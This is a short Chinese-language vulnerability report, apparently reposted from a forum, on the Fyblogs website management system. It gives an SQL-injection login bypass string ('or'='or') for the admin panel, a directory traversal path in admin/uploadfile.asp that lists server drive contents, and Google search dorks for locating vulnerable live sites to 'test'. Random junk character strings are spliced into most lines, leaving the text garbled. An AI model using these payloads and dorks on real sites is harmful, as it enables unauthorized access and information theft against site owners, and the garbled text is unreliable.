漏洞类型: 未授权访问/权限绕过
& U- T' D& y. |: X ~" U0 |! q: M1 D
简要描述:) c" C- ^/ w* |6 C* i! q# P. l
' _: S$ O/ Z! ?( @- ~9 R
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
! E, q* _& R3 u/ n6 U3 R2 Z" J* d8 N0 c4 e- a. w/ s7 y
详细说明:% o3 b9 h4 ~ c) K8 x4 G
E, z. K3 l4 H; _5 c9 w. V后台万能密码 'or'='or'
# A4 u7 a! k, M7 m9 a5 u后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
A' I R$ T( r! m- Madmin/uploadfile.asp?currentFolder=/upfiles/../- g$ ]0 S0 d$ y& @( J" q t
" D% c4 k1 q7 _4 n1 \
漏洞证明:
$ ^; V' G( d' f" B3 \( Q7 q' A3 Q: e2 I' P: B) O) ~
谷歌:inurl:type.asp?id=1 新闻中心- K0 m4 B4 [0 y
或者 :inurl:download_ok.asp?+ k( s* d3 I% o2 E8 |* [
7 a0 M$ o& {& m8 C: N) x6 a7 S0 z
可以测试1 [. l [0 z* o5 P6 I( Q! N1 h, k- v
0 ]- j9 u; N- p- J1 m! `
d( _& F5 \: b5 n3 R2 r: y |